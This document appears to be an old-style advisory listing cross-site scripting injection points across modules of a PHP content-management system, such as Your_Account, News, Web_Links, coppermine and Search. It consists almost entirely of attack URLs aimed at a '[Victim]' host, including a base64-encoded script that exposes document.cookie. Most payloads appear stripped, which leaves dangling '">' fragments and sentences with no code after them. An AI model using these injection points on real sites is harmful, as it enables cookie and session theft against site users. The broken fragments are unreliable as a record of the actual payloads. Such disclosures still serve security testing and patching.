#############################
XSS in module 'Your_Account'
#############################
http://[Victim]/index.php?name=Your_Account&error=1
&uname=bGFsYWxh">
http://[Victim]/index.php?name=Your_Account&error=1
">
&uname=bGFsYWxh
http://[Victim]/index.php?name=Your_Account&profile=3
">
http://[Victim]/index.php?name=Your_Account&error=1&uname=
PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+
this PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+
is this ">
base64 cross site scripting , the XSS code are encoded in base64.
the username field are vulnerable too
insert in the box
and this code is executed...
#######################
XSS in module 'News'
#######################
http://[Victim]/index.php?name=News&catid=1">
http://[Victim]/index.php?name=News&file=article&sid=7">
http://[Victim]/index.php?name=News&file=submit
// texareas 'Story Text' and Extended text are vulnerables.
http://[Victim]/index.php?name=News&file=friend&sid=5">
#################################
XSS in module 'Stories_Archive'
#################################
http://[Victim]/index.php?name=Stories_Archive&sa=show_month
&year=2005&month=11">
http://[Victim]/index.php?name=Stories_Archive&sa=show_month
&year=2005">
>&month=11
http://[Victim]/index.php?name=Stories_Archive&sa=show_all
">
###########################
XSS in module 'Web_Links'
###########################
http://[Victim]/index.php?name=Web_Links&l_op=viewlink
&cid=15&min=10&orderby=title%20ASC&show=0">
http://[Victim]/index.php?name=Web_Links&l_op=viewlink
&cid=15">
http://[Victim]/index.php?name=Web_Links&l_op=toprated
&ratenum=5&ratetype=percent">
http://[Victim]/index.php?name=Web_Links&l_op=viewlink&cid=15
&orderby=titled">
###########################
XSS in module 'Surveys'
###########################
http://[Victim]/index.php?name=Surveys&op=results
">pollid=3
http://[Victim]/index.php?name=Surveys&op=results&pollid=5
">
###########################
XSS in module 'Downloads'
###########################
http://[Victim]/index.php?name=Downloads&c=1">
###########################
XSS in module 'coppermine'
###########################
http://[Victim]/coppermine/thumbnails/meta=">
topn/album=1.html
http://[Victim]/coppermine/thumbnails/metatopn/album=1.html
">
http://[Victim]/index.php?name=coppermine&file=thumbnails&album=1
">
############################
XSS in module -Search-
############################
http://[Victim]/index.php?name=Search
User input passed to the search box in the following
modules is not sanitised before being returned to users:
Search
Stories_Archive
Downloads
Topics
if we insert in the search box this code ">
this is executed wen we click in Search button.
####################### €nd ############################